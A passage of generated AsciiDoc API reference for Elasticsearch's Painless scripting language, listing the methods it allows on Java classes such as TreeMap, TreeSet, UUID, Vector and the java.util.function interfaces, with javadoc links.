{java11-javadoc}/java.base/java/util/TimeZone.html#getID()[getID]() -* int {java11-javadoc}/java.base/java/util/TimeZone.html#getOffset(long)[getOffset](long) -* int {java11-javadoc}/java.base/java/util/TimeZone.html#getOffset(int,int,int,int,int,int)[getOffset](int, int, int, int, int, int) -* int {java11-javadoc}/java.base/java/util/TimeZone.html#getRawOffset()[getRawOffset]() -* boolean {java11-javadoc}/java.base/java/util/TimeZone.html#hasSameRules(java.util.TimeZone)[hasSameRules](TimeZone) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/TimeZone.html#inDaylightTime(java.util.Date)[inDaylightTime](Date) -* boolean {java11-javadoc}/java.base/java/util/TimeZone.html#observesDaylightTime()[observesDaylightTime]() -* void {java11-javadoc}/java.base/java/util/TimeZone.html#setRawOffset(int)[setRawOffset](int) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* ZoneId {java11-javadoc}/java.base/java/util/TimeZone.html#toZoneId()[toZoneId]() -* boolean {java11-javadoc}/java.base/java/util/TimeZone.html#useDaylightTime()[useDaylightTime]() - - -[[painless-api-reference-shared-TooManyListenersException]] -==== TooManyListenersException -* {java11-javadoc}/java.base/java/util/TooManyListenersException.html#()[TooManyListenersException]() -* {java11-javadoc}/java.base/java/util/TooManyListenersException.html#(java.lang.String)[TooManyListenersException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-TreeMap]] -==== TreeMap -* {java11-javadoc}/java.base/java/util/TreeMap.html#()[TreeMap]() -* {java11-javadoc}/java.base/java/util/TreeMap.html#(java.util.Comparator)[TreeMap](Comparator) -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#ceilingEntry(java.lang.Object)[ceilingEntry](def) -* def {java11-javadoc}/java.base/java/util/NavigableMap.html#ceilingKey(java.lang.Object)[ceilingKey](def) -* void {java11-javadoc}/java.base/java/util/Map.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/TreeMap.html#clone()[clone]() -* List collect(BiFunction) -* def collect(Collection, BiFunction) -* Comparator {java11-javadoc}/java.base/java/util/SortedMap.html#comparator()[comparator]() -* def {java11-javadoc}/java.base/java/util/Map.html#compute(java.lang.Object,java.util.function.BiFunction)[compute](def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfAbsent(java.lang.Object,java.util.function.Function)[computeIfAbsent](def, Function) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfPresent(java.lang.Object,java.util.function.BiFunction)[computeIfPresent](def, BiFunction) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsKey(java.lang.Object)[containsKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsValue(java.lang.Object)[containsValue](def) -* int count(BiPredicate) -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableMap.html#descendingKeySet()[descendingKeySet]() -* NavigableMap {java11-javadoc}/java.base/java/util/NavigableMap.html#descendingMap()[descendingMap]() -* def each(BiConsumer) -* Set {java11-javadoc}/java.base/java/util/Map.html#entrySet()[entrySet]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#equals(java.lang.Object)[equals](Object) -* boolean every(BiPredicate) -* Map.Entry find(BiPredicate) -* Map findAll(BiPredicate) -* def findResult(BiFunction) -* def findResult(def, BiFunction) -* List findResults(BiFunction) -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#firstEntry()[firstEntry]() -* def {java11-javadoc}/java.base/java/util/SortedMap.html#firstKey()[firstKey]() -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#floorEntry(java.lang.Object)[floorEntry](def) -* def {java11-javadoc}/java.base/java/util/NavigableMap.html#floorKey(java.lang.Object)[floorKey](def) -* void {java11-javadoc}/java.base/java/util/Map.html#forEach(java.util.function.BiConsumer)[forEach](BiConsumer) -* def {java11-javadoc}/java.base/java/util/Map.html#get(java.lang.Object)[get](def) -* Object getByPath(null) -* Object getByPath(null, Object) -* def {java11-javadoc}/java.base/java/util/Map.html#getOrDefault(java.lang.Object,java.lang.Object)[getOrDefault](def, def) -* Map groupBy(BiFunction) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* SortedMap {java11-javadoc}/java.base/java/util/SortedMap.html#headMap(java.lang.Object)[headMap](def) -* NavigableMap {java11-javadoc}/java.base/java/util/NavigableMap.html#headMap(java.lang.Object,boolean)[headMap](def, boolean) -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#higherEntry(java.lang.Object)[higherEntry](def) -* def {java11-javadoc}/java.base/java/util/NavigableMap.html#higherKey(java.lang.Object)[higherKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#isEmpty()[isEmpty]() -* Set {java11-javadoc}/java.base/java/util/Map.html#keySet()[keySet]() -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#lastEntry()[lastEntry]() -* def {java11-javadoc}/java.base/java/util/SortedMap.html#lastKey()[lastKey]() -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#lowerEntry(java.lang.Object)[lowerEntry](def) -* def {java11-javadoc}/java.base/java/util/Map.html#merge(java.lang.Object,java.lang.Object,java.util.function.BiFunction)[merge](def, def, BiFunction) -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableMap.html#navigableKeySet()[navigableKeySet]() -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#pollFirstEntry()[pollFirstEntry]() -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#pollLastEntry()[pollLastEntry]() -* def {java11-javadoc}/java.base/java/util/Map.html#put(java.lang.Object,java.lang.Object)[put](def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#putAll(java.util.Map)[putAll](Map) -* def {java11-javadoc}/java.base/java/util/Map.html#putIfAbsent(java.lang.Object,java.lang.Object)[putIfAbsent](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object,java.lang.Object)[remove](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object)[replace](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object,java.lang.Object)[replace](def, def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#replaceAll(java.util.function.BiFunction)[replaceAll](BiFunction) -* int {java11-javadoc}/java.base/java/util/Map.html#size()[size]() -* SortedMap {java11-javadoc}/java.base/java/util/SortedMap.html#subMap(java.lang.Object,java.lang.Object)[subMap](def, def) -* NavigableMap {java11-javadoc}/java.base/java/util/NavigableMap.html#subMap(java.lang.Object,boolean,java.lang.Object,boolean)[subMap](def, boolean, def, boolean) -* SortedMap {java11-javadoc}/java.base/java/util/SortedMap.html#tailMap(java.lang.Object)[tailMap](def) -* NavigableMap {java11-javadoc}/java.base/java/util/NavigableMap.html#tailMap(java.lang.Object,boolean)[tailMap](def, boolean) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Collection {java11-javadoc}/java.base/java/util/Map.html#values()[values]() - - -[[painless-api-reference-shared-TreeSet]] -==== TreeSet -* {java11-javadoc}/java.base/java/util/TreeSet.html#()[TreeSet]() -* {java11-javadoc}/java.base/java/util/TreeSet.html#(java.util.Comparator)[TreeSet](Comparator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#ceiling(java.lang.Object)[ceiling](def) -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/TreeSet.html#clone()[clone]() -* List collect(Function) -* def collect(Collection, Function) -* Comparator {java11-javadoc}/java.base/java/util/SortedSet.html#comparator()[comparator]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* Iterator {java11-javadoc}/java.base/java/util/NavigableSet.html#descendingIterator()[descendingIterator]() -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableSet.html#descendingSet()[descendingSet]() -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/Set.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* def {java11-javadoc}/java.base/java/util/SortedSet.html#first()[first]() -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#floor(java.lang.Object)[floor](def) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/Set.html#hashCode()[hashCode]() -* SortedSet {java11-javadoc}/java.base/java/util/SortedSet.html#headSet(java.lang.Object)[headSet](def) -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableSet.html#headSet(java.lang.Object,boolean)[headSet](def, boolean) -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#higher(java.lang.Object)[higher](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* def {java11-javadoc}/java.base/java/util/SortedSet.html#last()[last]() -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#lower(java.lang.Object)[lower](def) -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#pollFirst()[pollFirst]() -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#pollLast()[pollLast]() -* boolean {java11-javadoc}/java.base/java/util/Set.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* SortedSet {java11-javadoc}/java.base/java/util/SortedSet.html#subSet(java.lang.Object,java.lang.Object)[subSet](def, def) -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableSet.html#subSet(java.lang.Object,boolean,java.lang.Object,boolean)[subSet](def, boolean, def, boolean) -* double sum() -* double sum(ToDoubleFunction) -* SortedSet {java11-javadoc}/java.base/java/util/SortedSet.html#tailSet(java.lang.Object)[tailSet](def) -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableSet.html#tailSet(java.lang.Object,boolean)[tailSet](def, boolean) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-UUID]] -==== UUID -* static UUID {java11-javadoc}/java.base/java/util/UUID.html#fromString(java.lang.String)[fromString](null) -* static UUID {java11-javadoc}/java.base/java/util/UUID.html#nameUUIDFromBytes(byte%5B%5D)[nameUUIDFromBytes](byte[]) -* static UUID {java11-javadoc}/java.base/java/util/UUID.html#randomUUID()[randomUUID]() -* {java11-javadoc}/java.base/java/util/UUID.html#(long,long)[UUID](long, long) -* int {java11-javadoc}/java.base/java/util/UUID.html#clockSequence()[clockSequence]() -* int {java11-javadoc}/java.base/java/util/UUID.html#compareTo(java.util.UUID)[compareTo](UUID) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/util/UUID.html#getLeastSignificantBits()[getLeastSignificantBits]() -* long {java11-javadoc}/java.base/java/util/UUID.html#getMostSignificantBits()[getMostSignificantBits]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* long {java11-javadoc}/java.base/java/util/UUID.html#node()[node]() -* long {java11-javadoc}/java.base/java/util/UUID.html#timestamp()[timestamp]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* int {java11-javadoc}/java.base/java/util/UUID.html#variant()[variant]() -* int {java11-javadoc}/java.base/java/util/UUID.html#version()[version]() - - -[[painless-api-reference-shared-UnknownFormatConversionException]] -==== UnknownFormatConversionException -* {java11-javadoc}/java.base/java/util/UnknownFormatConversionException.html#(java.lang.String)[UnknownFormatConversionException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/util/UnknownFormatConversionException.html#getConversion()[getConversion]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-UnknownFormatFlagsException]] -==== UnknownFormatFlagsException -* {java11-javadoc}/java.base/java/util/UnknownFormatFlagsException.html#(java.lang.String)[UnknownFormatFlagsException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/util/UnknownFormatFlagsException.html#getFlags()[getFlags]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Vector]] -==== Vector -* {java11-javadoc}/java.base/java/util/Vector.html#()[Vector]() -* {java11-javadoc}/java.base/java/util/Vector.html#(java.util.Collection)[Vector](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* void {java11-javadoc}/java.base/java/util/Vector.html#addElement(java.lang.Object)[addElement](def) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/Vector.html#clone()[clone]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* void {java11-javadoc}/java.base/java/util/Vector.html#copyInto(java.lang.Object%5B%5D)[copyInto](Object[]) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* def {java11-javadoc}/java.base/java/util/Vector.html#elementAt(int)[elementAt](int) -* Enumeration {java11-javadoc}/java.base/java/util/Vector.html#elements()[elements]() -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* def {java11-javadoc}/java.base/java/util/Vector.html#firstElement()[firstElement]() -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/List.html#get(int)[get](int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* void {java11-javadoc}/java.base/java/util/Vector.html#insertElementAt(java.lang.Object,int)[insertElementAt](def, int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* def {java11-javadoc}/java.base/java/util/Vector.html#lastElement()[lastElement]() -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* int {java11-javadoc}/java.base/java/util/Vector.html#lastIndexOf(java.lang.Object,int)[lastIndexOf](def, int) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* void {java11-javadoc}/java.base/java/util/Vector.html#removeAllElements()[removeAllElements]() -* boolean {java11-javadoc}/java.base/java/util/Vector.html#removeElement(java.lang.Object)[removeElement](def) -* void {java11-javadoc}/java.base/java/util/Vector.html#removeElementAt(int)[removeElementAt](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* void {java11-javadoc}/java.base/java/util/Vector.html#setElementAt(java.lang.Object,int)[setElementAt](def, int) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-java-util-function"] -=== Shared API for package java.util.function -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-BiConsumer]] -==== BiConsumer -* void {java11-javadoc}/java.base/java/util/function/BiConsumer.html#accept(java.lang.Object,java.lang.Object)[accept](def, def) -* BiConsumer {java11-javadoc}/java.base/java/util/function/BiConsumer.html#andThen(java.util.function.BiConsumer)[andThen](BiConsumer) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-BiFunction]] -==== BiFunction -* BiFunction {java11-javadoc}/java.base/java/util/function/BiFunction.html#andThen(java.util.function.Function)[andThen](Function) -* def {java11-javadoc}/java.base/java/util/function/BiFunction.html#apply(java.lang.Object,java.lang.Object)[apply](def, def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-BiPredicate]] -==== BiPredicate -* BiPredicate {java11-javadoc}/java.base/java/util/function/BiPredicate.html#and(java.util.function.BiPredicate)[and](BiPredicate) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* BiPredicate {java11-javadoc}/java.base/java/util/function/BiPredicate.html#negate()[negate]() -* BiPredicate {java11-javadoc}/java.base/java/util/function/BiPredicate.html#or(java.util.function.BiPredicate)[or](BiPredicate) -* boolean {java11-javadoc}/java.base/java/util/function/BiPredicate.html#test(java.lang.Object,java.lang.Object)[test](def, def) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-BinaryOperator]] -==== BinaryOperator -* static BinaryOperator {java11-javadoc}/java.base/java/util/function/BinaryOperator.html#maxBy(java.util.Comparator)[maxBy](Comparator) -* static BinaryOperator {java11-javadoc}/java.base/java/util/function/BinaryOperator.html#minBy(java.util.Comparator)[minBy](Comparator) -* BiFunction {java11-javadoc}/java.base/java/util/function/BiFunction.html#andThen(java.util.function.Function)[andThen](Function) -* def {java11-javadoc}/java.base/java/util/function/BiFunction.html#apply(java.lang.Object,java.lang.Object)[apply](def, def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-BooleanSupplier]] -==== BooleanSupplier -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/util/function/BooleanSupplier.html#getAsBoolean()[getAsBoolean]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Consumer]] -==== Consumer -* void {java11-javadoc}/java.base/java/util/function/Consumer.html#accept(java.lang.Object)[accept](def) -* Consumer {java11-javadoc}/java.base/java/util/function/Consumer.html#andThen(java.util.function.Consumer)[andThen](Consumer) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DoubleBinaryOperator]] -==== DoubleBinaryOperator -* double {java11-javadoc}/java.base/java/util/function/DoubleBinaryOperator.html#applyAsDouble(double,double)[applyAsDouble](double, double) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DoubleConsumer]] -==== DoubleConsumer -* void {java11-javadoc}/java.base/java/util/function/DoubleConsumer.html#accept(double)[accept](double) -* DoubleConsumer {java11-javadoc}/java.base/java/util/function/DoubleConsumer.html#andThen(java.util.function.DoubleConsumer)[andThen](DoubleConsumer) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DoubleFunction]] -==== DoubleFunction -* def {java11-javadoc}/java.base/java/util/function/DoubleFunction.html#apply(double)[apply](double) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DoublePredicate]] -==== DoublePredicate -* DoublePredicate {java11-javadoc}/java.base/java/util/function/DoublePredicate.html#and(java.util.function.DoublePredicate)[and](DoublePredicate) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* DoublePredicate {java11-javadoc}/java.base/java/util/function/DoublePredicate.html#negate()[negate]() -* DoublePredicate {java11-javadoc}/java.base/java/util/function/DoublePredicate.html#or(java.util.function.DoublePredicate)[or](DoublePredicate) -* boolean {java11-javadoc}/java.base/java/util/function/DoublePredicate.html#test(double)[test](double) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DoubleSupplier]] -==== DoubleSupplier -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* double {java11-javadoc}/java.base/java/util/function/DoubleSupplier.html#getAsDouble()[getAsDouble]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DoubleToIntFunction]] -==== DoubleToIntFunction -* int {java11-javadoc}/java.base/java/util/function/DoubleToIntFunction.html#applyAsInt(double)[applyAsInt](double) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DoubleToLongFunction]] -==== DoubleToLongFunction -* long {java11-javadoc}/java.base/java/util/function/DoubleToLongFunction.html#applyAsLong(double)[applyAsLong](double) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DoubleUnaryOperator]] -==== DoubleUnaryOperator -* static DoubleUnaryOperator {java11-javadoc}/java.base/java/util/function/DoubleUnaryOperator.html#identity()[identity]() -* DoubleUnaryOperator {java11-javadoc}/java.base/java/util/function/DoubleUnaryOperator.html#andThen(java.util.function.DoubleUnaryOperator)[andThen](DoubleUnaryOperator) -* double {java11-javadoc}/java.base/java/util/function/DoubleUnaryOperator.html#applyAsDouble(double)[applyAsDouble](double) -* DoubleUnaryOperator {java11-javadoc}/java.base/java/util/function/DoubleUnaryOperator.html#compose(java.util.function.DoubleUnaryOperator)[compose](DoubleUnaryOperator) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Function]] -==== Function -* static Function {java11-javadoc}/java.base/java/util/function/Function.html#identity()[identity]() -* Function {java11-javadoc}/java.base/java/util/function/Function.html#andThen(java.util.function.Function)[andThen](Function) -* def {java11-javadoc}/java.base/java/util/function/Function.html#apply(java.lang.Object)[apply](def) -* Function {java11-javadoc}/java.base/java/util/function/Function.html#compose(java.util.function.Function)[compose](Function) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IntBinaryOperator]] -==== IntBinaryOperator -* int {java11-javadoc}/java.base/java/util/function/IntBinaryOperator.html#applyAsInt(int,int)[applyAsInt](int, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IntConsumer]] -==== IntConsumer -* void {java11-javadoc}/java.base/java/util/function/IntConsumer.html#accept(int)[accept](int) -* IntConsumer {java11-javadoc}/java.base/java/util/function/IntConsumer.html#andThen(java.util.function.IntConsumer)[andThen](IntConsumer) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IntFunction]] -==== IntFunction -* def {java11-javadoc}/java.base/java/util/function/IntFunction.html#apply(int)[apply](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IntPredicate]] -==== IntPredicate -* IntPredicate {java11-javadoc}/java.base/java/util/function/IntPredicate.html#and(java.util.function.IntPredicate)[and](IntPredicate) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int 